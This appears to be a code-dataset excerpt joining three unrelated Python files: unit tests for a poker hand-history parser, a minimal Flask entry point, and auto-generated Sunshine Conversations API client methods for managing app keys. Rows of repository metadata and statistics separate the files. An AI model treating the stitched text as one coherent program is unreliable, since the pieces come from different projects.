self.assertEqual(1, tmp.three_bet_pos_nr(), msg=file)
file = 'izo.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(1, tmp.three_bet_pos_nr(), msg=file)
def test_four_bet_pos_nr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.four_bet_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.four_bet_pos_nr(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(3, tmp.four_bet_pos_nr(), msg=file)
def test_nr_of_players(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(6, tmp.nr_of_players(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(6, tmp.nr_of_players(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(5, tmp.nr_of_players(), msg=file)
class TestPlayerGeneral(unittest.TestCase):
def test_sd(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sd(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sd(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
file = 'r.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
player = '+Kolobok_AJ'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
player = 'wyzh250'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
def test_wsd(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.wsd(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
file = 'r.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = '+Kolobok_AJ'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = 'wyzh250'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
def test_sf(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sf(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sf(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
def test_st(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.st(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.st(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
def test_sr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sr(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sr(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
def test_ai(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'p-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'f-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Ivo.S06'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'lagun777'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'f-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'LarryTheStar'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'tumedico.com'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'asdEmo'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'shenglongdou'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 't-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'pokerdogg45'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'titanik80'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'SVMono'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'r-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Juliutzzz'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'Oscaryynn'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'r-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'SanikQ3'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'alexsile84'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'cinfinite23'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
def test_pos_nr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(4, tmp.pos_nr(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual(1, tmp.pos_nr(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(6, tmp.pos_nr(), msg=file + ' ' + player)
player = 'markgr111'
tmp = PlayerGeneral(hand, player)
self.assertEqual(5, tmp.pos_nr(), msg=file + ' ' + player)
player = 'LarryTheStar'
tmp = PlayerGeneral(hand, player)
self.assertEqual(3, tmp.pos_nr(), msg=file + ' ' + player)
player = 'Andy Wolf'
tmp = PlayerGeneral(hand, player)
self.assertEqual(2, tmp.pos_nr(), msg=file + ' ' + player)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(2, tmp.pos_nr(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(5, tmp.pos_nr(), msg=file + ' ' + player)
player = 'neamtzul82'
tmp = PlayerGeneral(hand, player)
self.assertEqual(4, tmp.pos_nr(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(1, tmp.pos_nr(), msg=file + ' ' + player)
player = 'P308mnlt'
tmp = PlayerGeneral(hand, player)
self.assertEqual(3, tmp.pos_nr(), msg=file + ' ' + player)
class TestFacingOpp(unittest.TestCase):
def test_self_better(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in3gr3r__F__XXX__T__XBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._better(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._better(),
msg=file + ' ' + street + ' ' + player)
def test_self_raiser(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._raiser(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._raiser(),
msg=file + ' ' + street + ' ' + player)
def test_self_dbetter(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._dbetter(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._dbetter(),
msg=file + ' ' + street + ' ' + player)
def test_self_cbetter(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BCF__T__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._cbetter(street),
msg=file + ' ' + street + ' ' + player)
def test_self_vs_mcb_better(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('kr', tmp._vs_mcb_better(),
msg=file + ' ' + street + ' ' + player)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._vs_mcb_better(),
msg=file + ' ' + street + ' ' + player)
def test_self_floater(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._floater(street),
msg=file + ' ' + street + ' ' + player)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._floater(street),
msg=file + ' ' + street + ' ' + player)
def test_self_plr_missed_cbet(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('sf', tmp._plr_missed_cbet(street),
msg=file + ' ' + street + ' ' + player)
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._plr_missed_cbet(street),
msg=file + ' ' + street + ' ' + player)
if __name__ == '__main__':
unittest.main()
| 43.312371 | 100 | 0.509523 | 56,291 | 481,417 | 4.213889 | 0.005383 | 0.126865 | 0.066453 | 0.090618 | 0.995464 | 0.994928 | 0.994157 | 0.992622 | 0.990641 | 0.989916 | 0 | 0.007331 | 0.337863 | 481,417 | 11,114 | 101 | 43.316268 | 0.736805 | 0.006167 | 0 | 0.977501 | 0 | 0 | 0.070525 | 0.017694 | 0 | 0 | 0 | 0 | 0.22996 | 1 | 0.008766 | false | 0 | 0.00039 | 0 | 0.010227 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4e713b9f65571b5710a8e37699b547bb992f4b10 | 94 | py | Python | main.py | Eswaraprasadp/Fraud-Detection | 4eb6c8dee423e9433b3894b9c4312b0d1e99aada | [
"MIT"
] | 1 | 2020-04-03T08:53:51.000Z | 2020-04-03T08:53:51.000Z | main.py | Eswaraprasadp/Fraud-Detection | 4eb6c8dee423e9433b3894b9c4312b0d1e99aada | [
"MIT"
] | 3 | 2020-11-13T18:40:29.000Z | 2021-03-19T07:44:38.000Z | main.py | Eswaraprasadp/Fraud-Detection | 4eb6c8dee423e9433b3894b9c4312b0d1e99aada | [
"MIT"
] | null | null | null | from application import app
@app.shell_context_processor
def make_shell_context():
return | 18.8 | 28 | 0.819149 | 13 | 94 | 5.615385 | 0.769231 | 0.328767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12766 | 94 | 5 | 29 | 18.8 | 0.890244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4ec8f034b594ea7ff04da846b8412a085f9c388c | 23,381 | py | Python | sunshine_conversations_client/api/app_keys_api.py | Dima2022/sunshine-conversations-python | 8085a82dc320d97f09bb0174d11dd1865a65404a | [
"Apache-2.0"
] | 4 | 2020-09-27T14:28:25.000Z | 2022-02-02T13:51:29.000Z | sunshine_conversations_client/api/app_keys_api.py | Dima2022/sunshine-conversations-python | 8085a82dc320d97f09bb0174d11dd1865a65404a | [
"Apache-2.0"
] | 3 | 2021-09-30T18:18:58.000Z | 2021-12-04T07:55:23.000Z | sunshine_conversations_client/api/app_keys_api.py | Dima2022/sunshine-conversations-python | 8085a82dc320d97f09bb0174d11dd1865a65404a | [
"Apache-2.0"
] | 5 | 2020-11-07T02:08:18.000Z | 2021-12-07T17:10:23.000Z | # coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class AppKeysApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_app_key(self, app_id, app_key_create_body, **kwargs): # noqa: E501
"""Create App Key # noqa: E501
Creates an API key for the specified app. The response body will include a secret as well as its corresponding id, which you can use to generate JSON Web Tokens to securely make API calls on behalf of the app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_app_key(app_id, app_key_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param AppKeyCreateBody app_key_create_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_app_key_with_http_info(app_id, app_key_create_body, **kwargs) # noqa: E501
def create_app_key_with_http_info(self, app_id, app_key_create_body, **kwargs): # noqa: E501
"""Create App Key # noqa: E501
Creates an API key for the specified app. The response body will include a secret as well as its corresponding id, which you can use to generate JSON Web Tokens to securely make API calls on behalf of the app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_app_key_with_http_info(app_id, app_key_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param AppKeyCreateBody app_key_create_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'app_key_create_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `create_app_key`") # noqa: E501
# verify the required parameter 'app_key_create_body' is set
if self.api_client.client_side_validation and ('app_key_create_body' not in local_var_params or # noqa: E501
local_var_params['app_key_create_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_key_create_body` when calling `create_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'app_key_create_body' in local_var_params:
body_params = local_var_params['app_key_create_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_app_key(self, app_id, key_id, **kwargs): # noqa: E501
"""Delete App Key # noqa: E501
Removes an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_app_key(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_app_key_with_http_info(app_id, key_id, **kwargs) # noqa: E501
def delete_app_key_with_http_info(self, app_id, key_id, **kwargs): # noqa: E501
"""Delete App Key # noqa: E501
Removes an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_app_key_with_http_info(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'key_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `delete_app_key`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `delete_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys/{keyId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_app_key(self, app_id, key_id, **kwargs): # noqa: E501
"""Get App Key # noqa: E501
Returns an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_key(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_app_key_with_http_info(app_id, key_id, **kwargs) # noqa: E501
def get_app_key_with_http_info(self, app_id, key_id, **kwargs): # noqa: E501
"""Get App Key # noqa: E501
Returns an API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_app_key_with_http_info(app_id, key_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str key_id: The id of the key. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'key_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_app_key" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_app_key`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `get_app_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys/{keyId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_app_keys(self, app_id, **kwargs): # noqa: E501
"""List App Keys # noqa: E501
Lists all API keys for a given app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_app_keys(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AppKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_app_keys_with_http_info(app_id, **kwargs) # noqa: E501
